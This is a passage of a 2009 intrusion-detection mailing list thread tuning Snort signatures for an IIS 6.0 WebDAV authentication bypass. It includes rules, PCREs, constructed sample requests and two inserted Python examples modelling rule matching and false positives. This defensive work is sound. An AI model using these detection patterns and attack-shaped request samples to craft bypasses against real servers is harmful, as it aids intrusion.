References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242869674.97653.50.camel@localhost> <314cf0830905210559v65621d42rcde1bee3e72ea8ec@mail.gmail.com>
Message-ID: <1242913100.6787.2.camel@localhost>

On Thu, 2009-05-21 at 08:59 -0400, Joel Esler wrote:
> TurboSnort's speed tests are not correct, for many reasons, I suggest
> you don't use it.

Uhm, we stopped using that years ago... Are they even still around? Last time I checked (2005?) they were offline...

-Frank

--
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.

From eslerj at gmail.com Thu May 21 09:40:21 2009
From: eslerj at gmail.com (Joel Esler)
Date: Thu, 21 May 2009 09:40:21 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242913100.6787.2.camel@localhost>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242869674.97653.50.camel@localhost> <314cf0830905210559v65621d42rcde1bee3e72ea8ec@mail.gmail.com> <1242913100.6787.2.camel@localhost>
Message-ID: <314cf0830905210640h53cf208fmcb8f1899fb3498ad@mail.gmail.com>

On Thu, May 21, 2009 at 9:38 AM, Frank Knobbe wrote:
> On Thu, 2009-05-21 at 08:59 -0400, Joel Esler wrote:
>
> > TurboSnort's speed tests are not correct, for many reasons, I suggest
> > you don't use it.
>
> Uhm, we stopped using that years ago... Are they even still around? Last
> time I checked (2005?) they were offline...
>

I haven't checked in an equal amount of time :). I was just suggesting an FYI for the perfmon.

--
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974

From wkitty42 at windstream.net Thu May 21 09:55:06 2009
From: wkitty42 at windstream.net (waldo kitty)
Date: Thu, 21 May 2009 09:55:06 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242869674.97653.50.camel@localhost> <1242870380.97653.51.camel@localhost>
Message-ID: <4A155D3A.3020604@windstream.net>

Joshua Gimer wrote:
> Version 2.8.3.2 (Build 22)
>
> Initializing rule chains...
> 6633 Snort rules read
>     6633 detection rules
>     0 decoder rules
>     0 preprocessor rules
> 6633 Option Chains linked into 339 Chain Headers
> 0 Dynamic rules

you must not be using the netbios.rules, either?? that version pukes all over the netbios.rules using the dce_iface keyword... all 104 of them :?

--
 _\/ (@@)                           Waldo Kitty, Waldo's Place USA
__ooO_( )_Ooo_____________________ telnet://bbs.wpusa.dynip.com
_|_____|_____|_____|_____|_____|_____ http://www.wpusa.dynip.com
____|_____|_____|_____|_____|_____|____ ftp://ftp.wpusa.dynip.com
_|_Eat_SPAM_to_email_me!_YUM!__|_____ wkitty42 -at- windstream.net

From mcholste at gmail.com Thu May 21 10:04:57 2009
From: mcholste at gmail.com (Martin Holste)
Date: Thu, 21 May 2009 09:04:57 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242871195.97653.55.camel@localhost> <9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>
Message-ID:

The resounding answer I got when I posed the same question a few months ago was that ET rules wouldn't allow the new http content modifiers because they required modern versions of Snort (>= 2.8.3, I think) and would therefore break some users' implementations. I propose that a sunset date be created so that everyone can work to a date when a given version will become the standard. Because:

What I think many are forgetting regarding the performance of various content matches is that the http preproc is already doing a lot of pattern matching on _every_ packet it detects as HTTP. Specifically, in order to extract the HTTP method used, the basic equivalent of a 'content: "GET /"' is being applied whether you tell it to or not. Then it does the matching to extract the URI, etc. So, we should leverage what has already been parsed and extracted as much as possible, and that will certainly give you a performance boost.

The other thing for those of you who haven't ventured into too much of the performance tuning arena is to really pay attention to what pattern matcher you are using under the "config detection" directive. There is a huge, huge performance difference on a busy network between ac-bnfa and ac, and a corresponding amount of RAM required. My limited understanding is that the more of the ac tree you load into memory, the farther down the matching tree you can go before the processor has to really do work. And please, if you're still using the Boyer-Moore matcher (lowmem), stop! Aho-Corasick uses more of a binary search tree (Comp Sci Ph.D.'s please step in any time here) approach whereas Boyer-Moore takes the longest string, and for every 2x increment of the string length, checks to see if the middle of the 2x increment is the last letter of the pattern, so it proceeds more like what Frank was describing.

Thanks,

Martin

On Wed, May 20, 2009 at 11:26 PM, Rodrigo Montoro(Sp0oKeR) < spooker at gmail.com> wrote:
> Since I saw them in the Snort 2.8.3 release I have never seen people using them
> to create rules (that includes myself).
>
> 2008-09-04 - Snort 2.8.3
>
> [*] New Additions
> * New Feature for HTTP Inspect to split requests into 5 components -
> Method, URI, Header (non-cookie), Cookies, Body.
>
>
>
> http_method (
> http://www.snort.org/docs/snort_htmanuals/htmanual_284/node257.html
> ) keyword and http_headers (
> http://www.snort.org/docs/snort_htmanuals/htmanual_284/node254.html )
> .
>
> My question is: don't those keywords improve performance?
>
>
> Regards,
>
>
> On Wed, May 20, 2009 at 10:59 PM, Frank Knobbe wrote:
> > On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
> >> Adapting the rules to other methods should be easy enough, maybe
> something like:
> >>
> >> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> >> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
> >> pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
> >> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
> >> rev:1;)
> >
> >
> > I just ran it for 3 minutes on my sensors and had to immediately pull
> > it :) Sorry, just way too many FP's since it fires on legitimate
> > encodings (like "help%20%20me" :)
> >
> >
> > Sorry, as I had thought yesterday, we need sigs for the dangerous
> > Unicode versions. %..%.. simply isn't cutting it :)
> >
> >
> > Cheers,
> > Frank
> >
> >
> > PS: That said, the VRT rule created more FP's :)
> >
> >
> > --
> > It is said that the Internet is a public utility. As such, it is best
> > compared to a sewer. A big, fat pipe with a bunch of crap sloshing
> > against your ports.
> >
> >
> --
> ===========================
> Rodrigo Montoro (Sp0oKeR)
> http://www.spooker.com.br
> http://www.snort.org.br
> http://www.linkedin.com/in/spooker
> ===========================
>
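An added example, not code from the thread or from Snort, modelling the two stages Joel describes and Frank and Martin argue about: the fast-pattern matcher pre-qualifies rules on their longest content with one Aho-Corasick pass, and a content:"GET "; depth:4; check only runs inside the full option chain afterwards. The engine, the rules and the three requests are constructed for illustration (rule 3 is filler so the matcher holds more than one pattern); the results show that "GET " never becomes the fast pattern, that the pre-qualification alone spares the pcre on requests lacking "Translate: f", and that a legitimate %20%20 request carrying that header alerts under both rule shapes.

```python
"""Toy two-stage engine as the thread describes Snort: the fast-pattern matcher
(FPM) makes one multi-pattern pass over the longest content of every rule, then
only rules whose fast pattern was seen get their full option chain evaluated."""
import re
from collections import deque
from dataclasses import dataclass
from typing import List, Optional


class AhoCorasick:  # the 'ac' matcher family Martin mentions, minimal form
    def __init__(self, patterns):
        self.goto, self.out, self.fail = [{}], [set()], [0]
        for p in patterns:
            node = 0
            for ch in p:
                if ch not in self.goto[node]:
                    self.goto.append({}); self.out.append(set()); self.fail.append(0)
                    self.goto[node][ch] = len(self.goto) - 1
                node = self.goto[node][ch]
            self.out[node].add(p)
        queue = deque(self.goto[0].values())      # depth-1 nodes fail to the root
        while queue:                               # BFS to build failure links
            r = queue.popleft()
            for ch, s in self.goto[r].items():
                queue.append(s)
                f = self.fail[r]
                while f and ch not in self.goto[f]:
                    f = self.fail[f]
                self.fail[s] = self.goto[f].get(ch, 0)
                self.out[s] |= self.out[self.fail[s]]

    def search(self, text):
        """One pass over the text, however many patterns are loaded."""
        node, found = 0, set()
        for ch in text:
            while node and ch not in self.goto[node]:
                node = self.fail[node]
            node = self.goto[node].get(ch, 0)
            found |= self.out[node]
        return found

@dataclass
class Content:
    pattern: str
    depth: Optional[int] = None    # Snort depth: look only in the first N bytes
    nocase: bool = False

@dataclass
class Rule:
    sid: int
    contents: List[Content]
    pcre: Optional[str] = None

    def fast_pattern(self):
        # Joel's description: the rule's longest content feeds the FPM. The FPM
        # pass here runs over a lowercased payload, so lowercase the pattern too.
        return max(self.contents, key=lambda c: len(c.pattern)).pattern.lower()

    def matches(self, payload):
        """Full option chain: every content must hit in its window, then the pcre."""
        for c in self.contents:
            window = payload if c.depth is None else payload[:c.depth]
            pat = c.pattern
            if c.nocase:
                window, pat = window.lower(), pat.lower()
            if pat not in window:
                return False
        return self.pcre is None or re.search(self.pcre, payload, re.I | re.S) is not None

class Engine:
    def __init__(self, rules):
        self.by_fp = {}
        for r in rules:
            self.by_fp.setdefault(r.fast_pattern(), []).append(r)
        self.fpm = AhoCorasick(self.by_fp)

    def inspect(self, payload):
        """Return (sids that alert, number of rules whose full chain was run)."""
        candidates = [r for fp in sorted(self.fpm.search(payload.lower())) for r in self.by_fp[fp]]
        return sorted(r.sid for r in candidates if r.matches(payload)), len(candidates)

LOOSE_PCRE = r"GET.*%..%.*HTTP"   # the thread's expression: '%', any two chars, '%'
RULES = [
    # Joshua's shape: content on the header, pcre on the request line.
    Rule(1, [Content("Translate: f", nocase=True)], LOOSE_PCRE),
    # Frank's shape: the same plus a cheap content:"GET "; depth:4; up front.
    Rule(2, [Content("GET ", depth=4), Content("Translate: f", nocase=True)], LOOSE_PCRE),
    # Constructed filler rule so the FPM carries more than one pattern.
    Rule(3, [Content("MOVE ", depth=5), Content("Destination:", nocase=True)]),
]
ENGINE = Engine(RULES)
# Constructed sample requests, not captured traffic.
PLAIN_GET = "GET /search?q=help%20%20me HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
DAV_GET = "GET /share/help%20%20me.doc HTTP/1.1\r\nHost: files.example.com\r\nTranslate: f\r\n\r\n"
DAV_POST = "POST /share/ HTTP/1.1\r\nHost: files.example.com\r\nTranslate: f\r\n\r\n"

if __name__ == "__main__":
    print([r.fast_pattern() for r in RULES])   # 'GET ' is never the fast pattern
    for req in (PLAIN_GET, DAV_GET, DAV_POST):
        print(ENGINE.inspect(req))             # (alerting sids, rules fully evaluated)
```

DAV_POST shows the cost side of Frank's check: both rules are still pre-qualified by "Translate: f" and fully evaluated, the "GET " content just makes rule 2 fail one step earlier than the pcre does.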
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090521/007dd357/attachment-0001.html From shirkdog_list at hotmail.com Thu May 21 10:53:01 2009 From: shirkdog_list at hotmail.com (Shirk Dog) Date: Thu, 21 May 2009 10:53:01 -0400 Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass In-Reply-To: <314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com> References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242871195.97653.55.camel@localhost> <314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com> Message-ID: PCRE FAIL pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; Watch your DOTS pcre:"/(?:GET|PUT|HEAD)[^\n]*?\x25\x2e\x2e\x25[^\n]*?HTTP/i" Joel and I already had a discussion about my broken thinking of the 'B' modifier and rawbytes. In reality, the http_preproc will process ALL HTTP traffic, as well as the processing that is done through the rule-chain. The normalization does not impact the rule-chain detection. This is the reason he offered to test the HTTP traffic, as our discussion made him as giddy as a school girl. He likes to help :) Shirkdog Free your mind... 
http://www.shirkdog.us Date: Thu, 21 May 2009 08:54:19 -0400 From: eslerj at gmail.com To: frank at knobbe.us CC: emerging-sigs at emergingthreats.net Subject: Re: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass On Wed, May 20, 2009 at 9:59 PM, Frank Knobbe wrote: On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote: > Adapting the rules to other methods should be easy enough, maybe something like: > > alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote > Auth Bypass - GET METHOD"; content:"Translate:"; nocase; > pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i"; > reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004; > rev:1;) I just ran it for a 3 minutes on my sensors and had to immediately pull it :) Sorry, just way too many FP's since it fires on legitimate encodings (like "help%20%20me" :) Sorry, as I had thought yesterday, we need sigs for the dangerous Unicode versions. %..%.. simply isn't cutting it :) This is why the http_inspect preprocessor was recommended, there isn't need for a rule in this situation, there is need for code already in place. The same reason why writing rules for USER.*{100} in FTP rules is stupid, the ftp preprocessor does this for you. -- joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974 _________________________________________________________________ Hotmail? goes with you. http://windowslive.com/Tutorial/Hotmail/Mobile?ocid=TXT_TAGLM_WL_HM_Tutorial_Mobile1_052009 -------------- next part -------------- An HTML attachment was scrubbed... 
From frank at knobbe.us Thu May 21 11:00:29 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Thu, 21 May 2009 10:00:29 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242871195.97653.55.camel@localhost> <314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com>
Message-ID: <1242918029.6787.14.camel@localhost>

On Thu, 2009-05-21 at 10:53 -0400, Shirk Dog wrote:
> PCRE FAIL
> pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi";
>
> Watch your DOTS
> pcre:"/(?:GET|PUT|HEAD)[^\n]*?\x25\x2e\x2e\x25[^\n]*?HTTP/i"
>

It doesn't matter. The design was to capture %, two chars, and %. Without a limitation on the actual Unicodes themselves, you will match on any legitimate traffic, like %20%20. That incurs a ton of FP's. You might as well run ngrep :)

To make this rule successful, you have to match on the possible hostile Unicode values themselves. Everything else misses the mark.

Cheers,
Frank

--
It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports.
From shirkdog_list at hotmail.com Thu May 21 11:40:30 2009
From: shirkdog_list at hotmail.com (Shirk Dog)
Date: Thu, 21 May 2009 11:40:30 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242918029.6787.14.camel@localhost>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242871195.97653.55.camel@localhost> <314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com> <1242918029.6787.14.camel@localhost>
Message-ID:

Right, that is what Dan Roelker did. :)

Shirkdog
Free your mind...
http://www.shirkdog.us

> Subject: RE: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
> From: frank at knobbe.us
> To: shirkdog_list at hotmail.com
> CC: eslerj at gmail.com; emerging-sigs at emergingthreats.net
> Date: Thu, 21 May 2009 10:00:29 -0500
>
> On Thu, 2009-05-21 at 10:53 -0400, Shirk Dog wrote:
> > PCRE FAIL
> > pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi";
> >
> > Watch your DOTS
> > pcre:"/(?:GET|PUT|HEAD)[^\n]*?\x25\x2e\x2e\x25[^\n]*?HTTP/i"
> >
>
> It doesn't matter. The design was to capture %, two chars, and %.
> Without a limitation on the actual Unicodes themselves, you will match
> on any legitimate traffic, like %20%20. That incurs a ton of FP's. You
> might as well run ngrep :)
>
> To make this rule successful, you have to match on the possible hostile
> Unicode values themselves. Everything else misses the mark.
>
> Cheers,
> Frank
>
> --
> It is said that the Internet is a public utility. As such, it is best
> compared to a sewer. A big, fat pipe with a bunch of crap sloshing
> against your ports.
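To make the false-positive argument in the exchange above concrete, here is an added Python example; it is not code from the list messages or from any Snort rule set. It runs the two PCREs posted by Joshua and Shirk Dog (Snort's /i becomes re.IGNORECASE; the /B rawbytes modifier has no meaning outside Snort and is dropped) over a few constructed request lines, and adds one constructed pattern that only flags percent-encoded bytes in the 0x80-0xFF range as a stand-in for Frank's "match the hostile values themselves" advice. The sample names and that non_ascii_escape heuristic are this example's own assumptions; the %C4%B0 request line is the Googlebot request Jack Pepper posts later in the thread.

```python
import re

# Patterns as posted in the thread. Snort's /i is re.IGNORECASE here; the /B
# (rawbytes) modifier has no equivalent outside Snort and is simply dropped.
PATTERNS = {
    # Joshua's original: "." matches ANY character, so "%..%" also matches
    # "%20%", i.e. any two adjacent percent escapes.
    "loose": re.compile(r"(GET|PUT|HEAD).*%..%.*HTTP", re.I),
    # Shirk Dog's "watch your dots" version: \x2e is a literal ".", so this
    # only matches the four-byte string "%..%" and nothing percent-encoded.
    "literal_dots": re.compile(
        r"(?:GET|PUT|HEAD)[^\n]*?\x25\x2e\x2e\x25[^\n]*?HTTP", re.I),
    # Constructed illustration (assumption, not a rule from the thread and not
    # a production rule): only flag percent-encoded bytes >= 0x80, the range
    # where non-ASCII and overlong encodings live.
    "non_ascii_escape": re.compile(r"%[89a-f][0-9a-f]", re.I),
}

# Constructed sample request lines. benign_utf8 is the Googlebot request from
# Jack Pepper's message; the other three are made up for this example.
SAMPLES = {
    "benign_spaces":   "GET /search?q=help%20%20me HTTP/1.1",
    "benign_utf8":     "GET /?ref=%C4%B0lkSexShop.Com HTTP/1.1",
    "literal_dot_dot": "GET /a/%..%/x HTTP/1.1",
    "plain":           "GET /index.html HTTP/1.1",
}


def evaluate(request_line):
    """Return {pattern_name: bool} for one HTTP request line."""
    return {name: bool(p.search(request_line)) for name, p in PATTERNS.items()}


def hits_by_pattern(samples=SAMPLES):
    """Return {pattern_name: sorted list of sample names it fires on}."""
    out = {name: [] for name in PATTERNS}
    for sample_name, line in samples.items():
        for pat, hit in evaluate(line).items():
            if hit:
                out[pat].append(sample_name)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for pat, names in hits_by_pattern().items():
        print(f"{pat:18s} fires on: {names}")
```

Running it shows why the thread went the way it did: the loose pattern fires on both benign requests, the literal-dot version fires only on a literal "%..%" (tighter, but no longer looking at encoded traffic at all), and even the byte-range heuristic still flags the legitimate UTF-8 URI, which is in line with Frank's remark that matching specific values also produced false positives.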
From frank at knobbe.us Thu May 21 11:45:03 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Thu, 21 May 2009 10:45:03 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242871195.97653.55.camel@localhost> <314cf0830905210554w76d113e5gf871863371609aa1@mail.gmail.com> <1242918029.6787.14.camel@localhost>
Message-ID: <1242920703.6787.28.camel@localhost>

On Thu, 2009-05-21 at 11:40 -0400, Shirk Dog wrote:
> Right, that is what Dan Roelker did. :)

Yup. But sadly even that produced a lot of false positives :(

-Frank

From jonkman at jonkmans.com Thu May 21 12:18:13 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Thu, 21 May 2009 12:18:13 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242871195.97653.55.camel@localhost> <9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com>
Message-ID: <4A157EC5.4030501@jonkmans.com>

You're right Martin, we're avoiding the newest directives when there is an alternative for the time being to avoid breaking older installs. We do need a sunset date though. We could really optimize the malware http sigs with the new uri stuff.

What does everyone think is a reasonable time for upgrading? How about we say we start going to 2.8.3+ directives on July 1 2009?

Matt

Martin Holste wrote:
> The resounding answer I got when I posed the same question a few months
> ago was that ET rules wouldn't allow the new http content modifiers
> because they required modern versions of Snort (>= 2.8.3, I think) and
> would therefore break some user's implementations. I propose that a
> sunset date be created so that everyone can work to a date when a given
> version will become the standard.
>
> Because:
>
> What I think many are forgetting regarding the performance of various
> content matches is that the http preproc is already doing a lot of
> pattern matching on _every_ packet it detects as HTTP. Specifically, in
> order to extract the HTTP method used, the basic equivalent of a
> 'content: "GET /"' is being applied whether you tell it to or not. Then
> it does the matching to extract the URI, etc. So, we should leverage
> what has already been parsed and extracted as much as possible, and that
> will certainly give you a performance boost.
>
> The other thing for those of you who haven't ventured into too much of
> the performance tuning arena is to really pay attention to what pattern
> matcher you are using under the "config detection" directive. There is
> a huge, huge performance difference on a busy network between ac-bnfa
> and ac, and a corresponding amount of RAM required. My limited
> understanding is that the more of the ac tree you load into memory, the
> farther down the matching tree you can go before the processor has to
> really do work. And please, if you're still using the Boyer-Moore
> matcher (lowmem), stop! Aho-Corasick uses more of a binary search tree
> (Comp Sci Ph.D.'s please step in any time here) approach whereas
> Boyer-Moore takes the longest string, and for every 2x increment of the
> string length, checks to see if the middle of the 2x increment is the
> last letter of the pattern, so it proceeds more like what Frank was
> describing.
>
> Thanks,
>
> Martin
>
> On Wed, May 20, 2009 at 11:26 PM, Rodrigo Montoro(Sp0oKeR) wrote:
>
> Since I saw them at snort 2.8.3 release I never see people using them
> to create rules (thats include myself).
>
> 2008-09-04 - Snort 2.8.3
>
> [*] New Additions
> * New Feature for HTTP Inspect to split requests into 5 components -
> Method, URI, Header (non-cookie), Cookies, Body.
>
> http_method ( http://www.snort.org/docs/snort_htmanuals/htmanual_284/node257.html )
> keyword and http_headers ( http://www.snort.org/docs/snort_htmanuals/htmanual_284/node254.html ) .
>
> My question is: don't those keywords improve performance ?
>
> Regards,
>
> On Wed, May 20, 2009 at 10:59 PM, Frank Knobbe wrote:
>
> > On Wed, 2009-05-20 at 19:24 -0600, Joshua Gimer wrote:
> >> Adapting the rules to other methods should be easy enough, maybe
> >> something like:
> >>
> >> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> >> Auth Bypass - GET METHOD"; content:"Translate:"; nocase;
> >> pcre:"/(GET|PUT|HEAD).*%..%.*HTTP/Bi"; pcre:"/Translate: *f/i";
> >> reference:url,isc.sans.org/diary.html?storyid=6397;sid:1000004;
> >> rev:1;)
> >
> > I just ran it for a 3 minutes on my sensors and had to immediately pull
> > it :) Sorry, just way too many FP's since it fires on legitimate
> > encodings (like "help%20%20me" :)
> >
> > Sorry, as I had thought yesterday, we need sigs for the dangerous
> > Unicode versions. %..%.. simply isn't cutting it :)
> >
> > Cheers,
> > Frank
> >
> > PS: That said, the VRT rule created more FP's :)
> >
> > --
> > It is said that the Internet is a public utility. As such, it is best
> > compared to a sewer. A big, fat pipe with a bunch of crap sloshing
> > against your ports.
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> --
> ===========================
> Rodrigo Montoro (Sp0oKeR)
> http://www.spooker.com.br
> http://www.snort.org.br
> http://www.linkedin.com/in/spooker
> ===========================

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From Raymond.Pesek at ThirdFederal.com Thu May 21 12:27:28 2009
From: Raymond.Pesek at ThirdFederal.com (Raymond Pesek)
Date: Thu, 21 May 2009 12:27:28 -0400
Subject: [Emerging-Sigs] Sunset date for older versions of Snort using ET rules
In-Reply-To: <4A157EC5.4030501@jonkmans.com>
References: <9255886c0905191702q57ae0d16x2c1636ca4ff27550@mail.gmail.com> <1242865846.97653.27.camel@localhost> <1242871195.97653.55.camel@localhost> <9255886c0905202126i779c71d9o4ec069cfea4cecb8@mail.gmail.com> <4A157EC5.4030501@jonkmans.com>
Message-ID:

I changed the Subject to make it more pertinent.
July 1 2009 is fine with me. I'd suggest keeping an archive of June 30th that people can download if needed for some reason.

Is there some reason we could not use 2.8.4 as the minimum version instead?

Ray

-----Original Message-----
From: emerging-sigs-bounces at emergingthreats.net [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Matt Jonkman
Sent: Thursday, May 21, 2009 12:18 PM
To: Martin Holste
Cc: emerging-sigs at emergingthreats.net; Frank Knobbe
Subject: Re: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass

You're right Martin, we're avoiding the newest directives when there is an alternative for the time being to avoid breaking older installs. We do need a sunset date though. We could really optimize the malware http sigs with the new uri stuff.

What does everyone think is a reasonable time for upgrading? How about we say we start going to 2.8.3+ directives on July 1 2009?

Matt

Please consider the environment before printing this email message.

From emerging at emergingthreats.net Thu May 21 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Thu, 21 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090521200011.97AEE4504B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Thu May 21 16:00:11 2009 [***]

[///] Modified active rules: [///]

2006371 - ET P2P BearShare P2P Gnutella Client User-Agent (BearShare 6.x.x.x) (emerging-p2p.rules)
2006372 - ET P2P Bittorrent P2P Client User-Agent (Bittorrent/5.x.x) (emerging-p2p.rules)
2006375 - ET P2P Bittorrent P2P Client HTTP Request (emerging-p2p.rules)
2006379 - ET P2P BearShare P2P Gnutella Client HTTP Request (emerging-p2p.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (4):
2006371 || ET P2P BearShare P2P Gnutella Client User-Agent (BearShare 6.x.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare ||
url,doc.emergingthreats.net/bin/view/Main/2006371 2006372 || ET P2P Bittorrent P2P Client User-Agent (Bittorrent/5.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006372 2006375 || ET P2P Bittorrent P2P Client HTTP Request || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006375 2006379 || ET P2P BearShare P2P Gnutella Client HTTP Request || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006379 -> Added to emerging-sid-msg.map.txt (4): 2006371 || ET P2P BearShare P2P Gnutella Client User-Agent (BearShare 6.x.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006371 2006372 || ET P2P Bittorrent P2P Client User-Agent (Bittorrent/5.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006372 2006375 || ET P2P Bittorrent P2P Client HTTP Request || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006375 2006379 || ET P2P BearShare P2P Gnutella Client HTTP Request || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006379 [---] Removed non-rule lines: [---] -> Removed from emerging-sid-msg.map (44): 2006371 || ET MALWARE BearShare P2P Gnutella Client User-Agent (BearShare 6.x.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006371 2006372 || ET MALWARE Bittorrent P2P Client User-Agent (Bittorrent/5.x.x) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006372 2006375 || ET MALWARE Bittorrent P2P Client 
HTTP Request || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_Bittorrent_Traffic || url,doc.emergingthreats.net/bin/view/Main/2006375 2006379 || ET MALWARE BearShare P2P Gnutella Client HTTP Request || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/P2P/P2P_BearShare || url,doc.emergingthreats.net/bin/view/Main/2006379 2500264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500269 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500273 || ET COMPROMISED Known Compromised or Hostile 